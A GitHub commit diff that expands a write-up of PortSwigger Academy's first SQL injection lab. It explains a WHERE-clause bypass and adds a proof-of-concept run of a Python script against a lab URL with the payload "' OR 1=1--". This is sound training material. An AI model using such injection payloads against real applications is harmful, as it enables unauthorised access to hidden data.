Skip to content

Commit 520ccbc

Browse files
twseptiantwseptian
committed
edit port swigger sqli description
1 parent ef7d824 commit 520ccbc

File tree

1 file changed

+11
-1
lines changed

1 file changed

+11
-1
lines changed

port_swigger_academy/sqli/sqli_lab_01.md

Lines changed: 11 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -34,4 +34,14 @@ This results in the SQL query:
3434

3535
`SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1`
3636

37-
The modified query will return all items where either the category is Gifts, or 1 is equal to 1. Since `1=1` is always true, the query will return all items.
37+
The modified query will return all items where either the category is Gifts, or 1 is equal to 1. Since `1=1` is always true, the query will return all items.
38+
39+
## PoC
40+
```bash
41+
$ python3 sqli_lab_01.py https://ac621f871fxxxxxxx.web-security-academy.net "' OR 1=1--"
42+
43+
>> Port Swigger - SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
44+
>> by twseptian
45+
46+
[✓] SQL Injection successful!
47+
```

0 commit comments

Comments
 (0)